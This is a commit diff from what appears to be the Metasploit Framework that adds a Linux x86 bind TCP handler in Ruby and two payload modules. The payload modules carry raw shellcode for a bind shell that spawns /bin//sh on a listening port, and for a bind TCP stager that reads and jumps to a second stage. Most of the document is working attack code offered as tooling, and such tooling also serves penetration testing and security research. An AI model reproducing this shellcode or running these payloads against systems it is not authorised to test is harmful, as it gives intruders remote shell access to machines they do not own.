bind tcp stager/inline for linux

git-svn-id: file:///home/svn/incoming/trunk@2776 4d416f70-5f16-0410-b530-b9f4589650da

lib/msf/core/handler.rb

@@ -117,7 +117,7 @@ module Handler
 	# The amount of time to wait for a session to come in.
 	#
 	def wfs_delay
-		1
+		2
 	end
 
 	#

lib/msf/core/handler/bind_tcp.rb

@@ -0,0 +1,112 @@
+module Msf
+module Handler
+
+###
+#
+# BindTcp
+# -------
+#
+# This module implements the Bind TCP handler.  This means that
+# it will attempt to connect to a remote host on a given port for a period of
+# time (typically the duration of an exploit) to see if a the payload has
+# started listening.  This can tend to be rather verbose in terms of traffic
+# and in general it is preferable to use reverse payloads.
+#
+###
+module BindTcp
+
+	include Msf::Handler
+
+	def self.handler_type
+		return "bind_tcp"
+	end
+
+	def initialize(info = {})
+		super
+
+		register_options(
+			[
+				Opt::RHOST,
+				Opt::LPORT(4444)
+			], Msf::Handler::BindTcp)
+
+		self.conn_threads = []
+	end
+
+	#
+	# No setup to speak of
+	#
+	def setup_handler
+	end
+
+	#
+	# Kills off the connection threads if there are any hanging around.
+	#
+	def cleanup_handler
+		# Kill any remaining handle_connection threads that might
+		# be hanging around
+		conn_threads.each { |thr|
+			thr.kill
+		}
+	end
+
+	#
+	# Starts monitoring for an outbound connection to become established.
+	#
+	def start_handler
+		listener_thread = Thread.new {
+			client = nil
+
+			print_status("Started bind handler")
+
+			# Keep trying to connect
+			callcc { |ctx|
+				while true
+					begin
+						client = Rex::Socket::Tcp.create(
+							'PeerHost' => datastore['RHOST'],
+							'PeerPort' => datastore['LPORT'].to_i,
+							'Comm'     => comm)
+					rescue Rex::ConnectionRefused
+						# Connection refused is a-okay
+					rescue
+						wlog("Exception caught in bind handler: #{$!}")
+					end
+	
+					ctx.call if (client)	
+	
+					# Wait a second before trying again
+					Rex::ThreadSafe.sleep(0.5)
+				end
+			}
+
+			# Valid client connection?
+			if (client)
+				# Start a new thread and pass the client connection
+				# as the input and output pipe.  Client's are expected
+				# to implement the Stream interface.
+				conn_threads << Thread.new {
+					begin
+						handle_connection(client)
+					rescue
+						elog("Exception raised from BindTcp.handle_connection: #{$!}")
+					end
+				}
+			end
+		}
+	end
+
+	# 
+	# Nothing to speak of.
+	#
+	def stop_handler
+	end
+
+protected
+
+	attr_accessor :conn_threads
+
+end
+
+end
+end

lib/rex/socket/tcp.rb

@@ -23,6 +23,13 @@ class Rex::Socket::Tcp < Rex::Socket
 	#
 	##
 
+	#
+	# Creates the client using the supplied hash
+	#
+	def self.create(hash)
+		self.create_param(Rex::Socket::Parameters.from_hash(hash))
+	end
+
 	#
 	# Wrapper around the base socket class' creation method that automatically
 	# sets the parameter's protocol to TCP

modules/payloads/singles/linux/x86/shell_bind_tcp.rb

@@ -0,0 +1,44 @@
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Msf
+module Payloads
+module Singles
+module Linux
+module X86
+
+module ShellBindTcp
+
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Linux Command Shell, Bind TCP Inline',
+			'Version'       => '$Revision$',
+			'Description'   => 'Listen for a connection and spawn a command shell',
+			'Author'        => [ 'skape', 'vlad902' ],
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Payload'       =>
+				{
+					'Offsets' =>
+						{
+							'LPORT'    => [ 0x14, 'n' ],
+						},
+					'Payload' =>
+						"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
+						"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
+						"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
+						"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +
+						"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +
+						"\x89\xe1\xcd\x80"
+				}
+			))
+	end
+
+end
+
+end end end end end

modules/payloads/singles/linux/x86/shell_reverse_tcp.rb

@@ -8,7 +8,7 @@ module Singles
 module Linux
 module X86
 
-module Shell
+module ShellReverseTcp
 
 	include Msf::Payload::Single
 

modules/payloads/stagers/linux/x86/bind_tcp.rb

@@ -0,0 +1,48 @@
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+module Msf
+module Payloads
+module Stagers
+module Linux
+module X86
+
+###
+#
+# BindTcp
+# -------
+#
+# Linux bind TCP stager.
+#
+###
+module BindTcp
+
+	include Msf::Payload::Stager
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Bind TCP Stager',
+			'Version'       => '$Revision$',
+			'Description'   => 'Listen for a connection',
+			'Author'        => 'skape',
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 0x14, 'n'    ],
+						},
+					'Payload' =>
+						"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +
+						"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +
+						"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +
+						"\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"
+				}
+			))
+	end
+
+end
+
+end end end end end